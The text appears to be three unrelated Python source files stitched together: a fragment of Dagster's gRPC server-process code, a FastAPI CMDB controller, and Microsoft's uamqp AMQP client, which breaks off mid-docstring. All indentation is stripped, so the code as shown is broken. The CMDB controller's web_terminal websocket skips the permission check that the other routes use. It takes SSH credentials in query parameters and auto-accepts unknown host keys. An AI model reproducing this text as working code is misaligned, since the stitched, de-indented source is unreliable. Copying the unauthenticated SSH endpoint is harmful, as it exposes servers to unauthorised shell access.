#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except DagsterUserCodeUnreachableError:
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
if server_process.poll() != None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
executable_path = loadable_target_origin.executable_path if loadable_target_origin else None
subprocess_args = (
(
get_python_environment_entry_point(executable_path)
if executable_path
else DEFAULT_DAGSTER_ENTRY_POINT
)
+ ["api", "grpc"]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
+ (["--use-python-environment-entry-point"] if executable_path else [])
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
controller.py | from fastapi import APIRouter, Depends, HTTPException, Request, WebSocket, File, UploadFile
from fastapi.responses import FileResponse
from schema.cmdb import CMDBTypeList, CMDBBase, CMDBItemBase, CMDBItemList
from models.cmdb.models import CMDBType, CMDBItem, CMDBRecord
from models.user.models import User
from core.db import get_db
from core.config import Settings
from api.perm.controller import check_perm
from sqlalchemy.orm import Session
from sqlalchemy import and_, or_, func
from utils.Record import Record
from copy import deepcopy
from typing import Dict
import paramiko
from threading import Thread
import asyncio
import time
import os
from utils.Excel import Excel
cmdb_router = APIRouter()
@cmdb_router.get('/type_list', response_model=CMDBTypeList, name="获取CMDB中所有对象类型")
async def cmdb_type_list(db: Session = Depends(get_db), current_user: User = Depends(check_perm('/cmdb/type_list'))):
cmdb_types = db.query(CMDBType).all()
return CMDBTypeList(types=[{"type_id": str(cmdb_type.cmdb_type_id), "type_name": cmdb_type.cmdb_type_name,
"type_label": cmdb_type.cmdb_type_label, "type_icon": cmdb_type.cmdb_type_icon} for
cmdb_type in cmdb_types])
@cmdb_router.put('/add_type', name="新增CMDB对象类型")
async def cmdb_add_type(new_type: CMDBBase, request: Request, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/add_type'))):
# type_name唯一
old_type = db.query(CMDBType).filter(CMDBType.cmdb_type_name == new_type.type_name).first()
if old_type:
raise HTTPException(status_code=406, detail="创建的类型已经存在")
cmdb_type = CMDBType(cmdb_type_name=new_type.type_name, cmdb_type_icon=new_type.type_icon,
cmdb_type_label=new_type.type_label)
new_record = deepcopy(cmdb_type)
db.add(cmdb_type)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
return {"message": "类型创建成功"}
@cmdb_router.get('/type_info', name="获取CMDB对象属性")
async def type_info(type_id: str, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/type_info'))):
search_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == int(type_id)).first()
if not search_type:
raise HTTPException(status_code=406, detail="查询ID不存在")
return CMDBBase(type_id=type_id, type_name=search_type.cmdb_type_name, type_label=search_type.cmdb_type_label,
type_icon=search_type.cmdb_type_icon)
@cmdb_router.post('/edit_type', name="修改CMDB对象类型")
async def cmdb_edit_type(edit_type: CMDBBase, request: Request, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/edit_type'))):
old_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == int(edit_type.type_id)).first()
if not old_type:
raise HTTPException(status_code=406, detail="要修改的类型不存在")
if old_type.cmdb_type_name != edit_type.type_name:
# 说明修改了类型名,需要判断修改后的类型是否已经存在
if db.query(CMDBType).filter(CMDBType.cmdb_type_name == edit_type.type_name).first():
raise HTTPException(status_code=406, detail="修改的类型已存在")
old_record = deepcopy(old_type)
old_type.cmdb_type_name = edit_type.type_name
old_type.cmdb_type_icon = edit_type.type_icon
old_type.cmdb_type_label = edit_type.type_label
new_record = deepcopy(old_type)
db.add(old_type)
db.commit()
Record.create_operate_record(username=current_user.username, old_object=old_record, new_object=new_record,
ip=request.client.host)
return {"message": "类型修改成功"}
@cmdb_router.get('/get_type_items', name="获取类型下所有的属性")
async def get_type_desc(type_id: str, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/get_type_items'))):
cmdb_type_items = db.query(CMDBItem).filter(CMDBItem.cmdb_type_id == int(type_id)).all()
return CMDBItemList(items=[{"item_id": cmdb_type_item.item_id, "item_label": cmdb_type_item.item_label,
"item_name": cmdb_type_item.item_name} for cmdb_type_item in cmdb_type_items])
@cmdb_router.put('/add_type_item', name="新增类型属性")
async def add_type_desc(request: Request, new_item: CMDBItemBase, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/add_type_item'))):
# 确认属性是否重复
old_item = db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == new_item.cmdb_type_id,
or_(CMDBItem.item_name == new_item.item_name,
CMDBItem.item_label == new_item.item_label))).first()
if old_item:
raise HTTPException(status_code=406, detail="此属性已存在")
item = CMDBItem(cmdb_type_id=int(new_item.cmdb_type_id), item_name=new_item.item_name,
item_label=new_item.item_label)
new_record = deepcopy(item)
db.add(item)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
return {"message": "属性新增成功"}
@cmdb_router.get('/item_info', name="获取类型属性详情")
def item_info(item_id: str, db: Session = Depends(get_db), current_user: User = Depends(check_perm('/cmdb/item_info'))):
item = db.query(CMDBItem).filter(CMDBItem.item_id == int(item_id)).first()
if not item:
raise HTTPException(status_code=406, detail="查询ID不存在")
return CMDBItemBase(item_id=item_id, cmdb_type_id=str(item.cmdb_type_id), item_label=item.item_label,
item_name=item.item_name)
@cmdb_router.post('/edit_type_item', name="修改类型属性")
async def edit_type_item(request: Request, edit_item: CMDBItemBase, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/edit_type_item'))):
type_id = int(edit_item.item_id)
old_item = db.query(CMDBItem).filter(CMDBItem.item_id == type_id).first()
if not old_item:
raise HTTPException(status_code=406, detail="要修改的属性不存在")
# 判断是否存在
if old_item.item_name != edit_item.item_name:
if db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == int(edit_item.cmdb_type_id),
CMDBItem.item_name == edit_item.item_name)).first():
raise HTTPException(status_code=406, detail="要修改的属性名已存在")
if old_item.item_label != edit_item.item_label:
if db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == int(edit_item.cmdb_type_id),
CMDBItem.item_label == edit_item.item_label)).first():
raise HTTPException(status_code=406, detail="要修改的标签名已存在")
old_record = deepcopy(old_item)
old_item.item_name = edit_item.item_name
old_item.item_label = edit_item.item_label
new_record = deepcopy(old_item)
db.add(old_item)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=new_record, old_object=old_record,
ip=request.client.host)
return {"message": "属性修改成功"}
@cmdb_router.get('/instance_lists', name="模型下实例列表")
async def instance_lists(type_id: str, page_no: int, page_size: int, search_str: str = '',
db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/instance_lists'))):
# 获取所有实例
if search_str:
total = db.query(func.count(CMDBRecord.cmdb_record_id)).filter(and_(CMDBRecord.cmdb_type_id == int(type_id),
CMDBRecord.cmdb_record_detail.like(
f"%{search_str}%"))).scalar()
instances = db.query(CMDBRecord).filter(
and_(CMDBRecord.cmdb_type_id == int(type_id), CMDBRecord.cmdb_record_detail.like(f"%{search_str}%"))).slice(
page_size * (page_no - 1), page_size * page_no)
else:
total = db.query(func.count(CMDBRecord.cmdb_record_id)).filter(CMDBRecord.cmdb_type_id == int(type_id)).scalar()
instances = db.query(CMDBRecord).filter(CMDBRecord.cmdb_type_id == int(type_id)).slice(
page_size * (page_no - 1), page_size * page_no)
# 获取类型下面所有属性
items = db.query(CMDBItem).filter(CMDBItem.cmdb_type_id == int(type_id)).all()
return {"total": total, "instances": [
{"cmdb_record_id": str(instance.cmdb_record_id), "cmdb_type_id": str(instance.cmdb_type_id),
"cmdb_record_detail": instance.cmdb_record_detail} for instance in instances], "items": items}
@cmdb_router.put('/add_record', name="新增记录")
async def add_record(request: Request, new_record: Dict[str, str], db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/add_record'))):
type_id = int(new_record.get("cmdb_type_id", "0"))
if type_id == 0:
raise HTTPException(status_code=406, detail="请传入cmdb_type_id")
# 删除id就是记录详情了
del new_record['cmdb_type_id']
if new_record == {}:
raise HTTPException(status_code=406, detail="未传入记录详情")
cmdb_record = CMDBRecord()
cmdb_record.cmdb_type_id = type_id
cmdb_record.cmdb_record_detail = new_record
record = deepcopy(cmdb_record)
db.add(cmdb_record)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=record, ip=request.client.host)
return {"message": "实例添加成功"}
@cmdb_router.get('/create_cmdb_template/{type_id}', name="下载cmdb模板")
async def create_cmdb_template(type_id: str, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/create_cmdb_template'))):
type_id = int(type_id)
cmdb_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == type_id).first()
if not cmdb_type:
raise HTTPException(status_code=406, detail="上传的类型不存在")
# 获取所有属性
cmdb_items = db.query(CMDBItem.item_name).filter(CMDBItem.cmdb_type_id == type_id).all()
keys = [cmdb_item.item_name for cmdb_item in cmdb_items]
# 文件命名规则: {type_name}模板.xlsx
filename = f"{cmdb_type.cmdb_type_name}模板.xlsx"
filepath = os.path.join(Settings.CMDB_FOLDER, filename)
excel = Excel(filepath=filepath)
# 根据最新数据生成模板
excel.create_cmdb_template(keys=keys)
return FileResponse(filepath, filename=filename)
@cmdb_router.post('/import_record/{type_id}', name="导入记录")
async def import_record(request: Request, type_id: str, file: UploadFile = File(...), db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/import_record'))):
# 获取用户上传的文件并存储,命名规则:{type_name}-{username}-{时间戳}
type_id = int(type_id)
cmdb_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == type_id).first()
if not cmdb_type:
raise HTTPException(status_code=406, detail="上传的类型不存在")
# 上传文件必须为Excel
if not file.content_type == "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet":
raise HTTPException(status_code=406, detail="请上传Excel文件")
cmdb_type_name = cmdb_type.cmdb_type_name
total_miles = str(int(round(time.time() * 1000)))
store_filename = f"{cmdb_type_name}-{total_miles}-{file.filename}"
content = await file.read()
# 保存用户上传的文件
with open(os.path.join(Settings.UPLOAD_FOLDER, store_filename), "wb+") as f:
f.write(content)
# 解析Excel
excel = Excel(filepath=os.path.join(Settings.UPLOAD_FOLDER, store_filename))
all_records = excel.import_cmdb_record()
if len(all_records) == 0:
raise HTTPException(status_code=406, detail="请填入具体数据")
# record插入数据库
for record in all_records:
cmdb_record = CMDBRecord()
cmdb_record.cmdb_type_id = type_id
cmdb_record.cmdb_record_detail = record
new_record = deepcopy(cmdb_record)
db.add(cmdb_record)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
return {"all_records": all_records}
@cmdb_router.post('/edit_record', name="修改记录")
async def edit_instance(request: Request, edit_record: Dict[str, str], db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/edit_record'))):
type_id = int(edit_record.get("cmdb_type_id", "0"))
record_id = int(edit_record.get("cmdb_record_id", "0"))
if type_id == 0 or record_id == 0:
raise HTTPException(status_code=406, detail="请传入id")
# 删除id就是记录详情了
del edit_record["cmdb_type_id"]
del edit_record["cmdb_record_id"]
instance = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == record_id).first()
old_record = deepcopy(instance)
instance.cmdb_record_detail = edit_record
new_record = deepcopy(instance)
db.add(instance)
db.commit()
Record.create_operate_record(username=current_user.username, new_object=new_record, old_object=old_record,
ip=request.client.host)
return {"message": "实例修改成功"}
@cmdb_router.delete('/delete_record', name="删除记录")
async def delete_record(request: Request, record_id: str, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/delete_record'))):
record = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == int(record_id)).first()
if not record:
raise HTTPException(status_code=406, detail="要删除的ID不存在")
old_record = deepcopy(record)
db.delete(record)
db.commit()
Record.create_operate_record(username=current_user.username, old_object=old_record, ip=request.client.host)
return {"message": "记录删除成功"}
@cmdb_router.get('/record_details/{record_id}', name="获取记录详情")
async def get_record_details(record_id: str, db: Session = Depends(get_db),
current_user: User = Depends(check_perm('/cmdb/record_details'))):
record_item = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == int(record_id)).first()
if not record_item:
raise HTTPException(status_code=406, detail="此ID信息不存在")
return {"message": "ok", "record_details": record_item.cmdb_record_detail}
@cmdb_router.websocket('/web_terminal', name="网页终端")
async def web_ssh(websocket: WebSocket, username: str, password: str, ip: str, port: str,
db: Session = Depends(get_db)):
await websocket.accept()
# 连接服务器
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(ip, int(port), username, password)
transport = ssh_client.get_transport()
chan = transport.open_session()
chan.get_pty(term='ansi', width=80, height=40)
chan = ssh_client.invoke_shell()
async def send_ssh():
try:
while True:
result = chan.recv(2048).decode('utf-8')
await websocket.send_text(result)
except Exception:
pass
# 初次连接,有两条信息返回,一个是上次登录信息,一个是默认信息
for i in range(2):
login_data = chan.recv(2048).decode('utf-8')
await websocket.send_text(login_data)
# 启动多线程接收ssh返回的信息
Thread(target=asyncio.run, args=(send_ssh(),)).start()
Thread(target=asyncio.run, args=(send_ssh(),)).start()
try:
while True:
# 监听前端传递的信息,传送给ssh
data = await websocket.receive_text()
chan.send(data)
except Exception as ex:
print(f"websocket closed:{str(ex)}")
await websocket.close()
ssh_client.close()
|
client.py | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
- uamqp.authentication.JWTTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, remote_address, auth=None, client_name=None, debug=False,
error_policy=None, keep_alive_interval=None, **kwargs):
self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
self._http_proxy = kwargs.pop('http_proxy', None)
self._remote_address = remote_address if isinstance(remote_address, address.Address) \
else address.Address(remote_address)
self._hostname = self._remote_address.hostname
if not auth:
username = self._remote_address.username
password = self._remote_address.password
if username and password:
username = compat.unquote_plus(username)
password = compat.unquote_plus(password)
auth = authentication.SASLPlain(
self._hostname, username, password,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._auth = auth if auth else authentication.SASLAnonymous(
self._hostname,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._name = client_name if client_name else str(uuid.uuid4())
self._debug_trace = debug
self._counter = c_uamqp.TickCounter()
self._shutdown = False
self._connection = None
self._ext_connection = False
self._session = None
self._backoff = 0
self._error_policy = error_policy or errors.ErrorPolicy()
self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
self._keep_alive_thread = None
# Connection settings
self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
self._channel_max = kwargs.pop('channel_max', None)
self._idle_timeout = kwargs.pop('idle_timeout', None)
self._properties = kwargs.pop('properties', None)
self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
'remote_idle_timeout_empty_frame_send_ratio', None)
# Session settings
self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._handle_max = kwargs.pop('handle_max', None)
self._on_attach = kwargs.pop('on_attach', None)
# Link settings
self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
self._desired_capabilities = kwargs.pop('desired_capabilities', None)
# AMQP object settings
self.message_handler = None
self.connection_type = Connection
self.session_type = Session
if kwargs:
raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
def _keep_alive(self):
start_time = self._counter.get_current_ms()
try:
while self._connection and not self._shutdown:
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - start_time)/1000
if elapsed_time >= self._keep_alive_interval:
_logger.debug("Keeping %r connection alive.", self.__class__.__name__)
self._connection.work()
start_time = current_time
time.sleep(1)
except Exception as e: # pylint: disable=broad-except
_logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
def _client_run(self):
"""Perform a single Connection iteration."""
self._connection.work()
def _redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
self._session.destroy()
self._session = None
self._auth = auth
self._hostname = self._remote_address.hostname
self._connection.redirect(redirect, auth)
self._build_session()
def _build_session(self):
"""Build self._session based on current self.connection.
"""
# pylint: disable=protected-access
if not self._connection._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
self._connection._cbs = self._auth.create_authenticator(
self._connection,
debug=self._debug_trace,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
self._session = self._auth._session # pylint: disable=protected-access
elif self._connection._cbs:
self._session = self._auth._session # pylint: disable=protected-access
else:
self._session = self.session_type(
self._connection,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
def open(self, connection=None):
"""Open the client. The client can create a new Connection
or an existing Connection can be passed in. This existing Connection
may have an existing CBS authentication Session, which will be
used for this client as well. Otherwise a new Session will be
created.
:param connection: An existing Connection that may be shared between
multiple clients.
:type connetion: ~uamqp.connection.Connection
"""
# pylint: disable=protected-access
if self._session:
return # already open.
_logger.debug("Opening client connection.")
try:
if connection:
_logger.debug("Using existing connection.")
self._auth = connection.auth
self._ext_connection = True
connection.lock()
self._connection = connection or self.connection_type(
self._hostname,
self._auth,
container_id=self._name,
max_frame_size=self._max_frame_size,
channel_max=self._channel_max,
idle_timeout=self._idle_timeout,
properties=self._properties,
remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
error_policy=self._error_policy,
debug=self._debug_trace,
encoding=self._encoding)
self._build_session()
if self._keep_alive_interval:
self._keep_alive_thread = threading.Thread(target=self._keep_alive)
self._keep_alive_thread.daemon = True
self._keep_alive_thread.start()
finally:
if self._ext_connection:
connection.release()
def close(self):
"""Close the client. This includes closing the Session
and CBS authentication layer as well as the Connection.
If the client was opened using an external Connection,
this will be left intact.
No further messages can be sent or received and the client
cannot be re-opened.
All pending, unsent messages will remain uncleared to allow
them to be inspected and queued to a new client.
"""
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = True
if self._keep_alive_thread:
self._keep_alive_thread.join()
self._keep_alive_thread = None
if not self._session:
return # already closed.
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
self._session.destroy()
else:
_logger.debug("CBS session pending.")
self._session = None
if not self._ext_connection:
_logger.debug("Closing exclusive connection.")
self._connection.destroy()
else:
_logger.debug("Shared connection remaining open.")
self._connection = None
def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
"""Run a request/response operation. These are frequently used for management
tasks against a $management node, however any node name can be specified
and the available options will depend on the target service.
:param message: The message to send in the management request.
:type message: ~uamqp.message.Message
:param operation: The type of operation to be performed. This value will
be service-specific, but common values include READ, CREATE and UPDATE.
This value will be added as an application property on the message.
:type operation: bytes
:param op_type: The type on which to carry out the operation. This will
be specific to the entities of the service. This value will be added as
an application property on the message.
:type op_type: bytes
:param node: The target node. Default is `b"$management"`.
:type node: bytes
:param timeout: Provide an optional timeout in milliseconds within which a response
to the management request must be received.
:type timeout: float
:param callback: The function to process the returned parameters of the management
request including status code and a description if available. This can be used
to reformat the response or raise an error based on content. The function must
take 3 arguments - status code, response message and description.
:type callback: ~callable[int, bytes, ~uamqp.message.Message]
:param status_code_field: Provide an alternate name for the status code in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusCode"`.
:type status_code_field: bytes
:param description_fields: Provide an alternate name for the description in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusDescription"`.
:type description_fields: bytes
:rtype: ~uamqp.message.Message
"""
while not self.auth_complete():
time.sleep(0.05)
response = self._session.mgmt_request(
message,
operation,
op_type=op_type,
node=node,
callback=callback,
encoding=self._encoding,
debug=self._debug_trace,
**kwargs)
return response
def auth_complete(self):
"""Whether the authentication handshake is complete during
connection initialization.
:rtype: bool
"""
timeout = False
auth_in_progress = False
if self._connection._cbs: # pylint: disable=protected-access
timeout, auth_in_progress = self._auth.handle_token()
if timeout is None and auth_in_progress is None:
_logger.debug("No work done.")
return False
if timeout:
raise compat.TimeoutException("Authorization timeout.")
if auth_in_progress:
self._connection.work()
return False
return True
def client_ready(self):
"""
Whether the handler has completed all start up processes such as
establishing the connection, session, link and authentication, and
is not ready to process messages.
:rtype: bool
"""
if not self.auth_complete():
return False
if not self._client_ready():
self._connection.work()
return False
return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
class SendClient(AMQPClient):
"""An AMQP client for sending messages.
:param target: The target AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Target object.
:type target: str, bytes or ~uamqp.address.Target
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
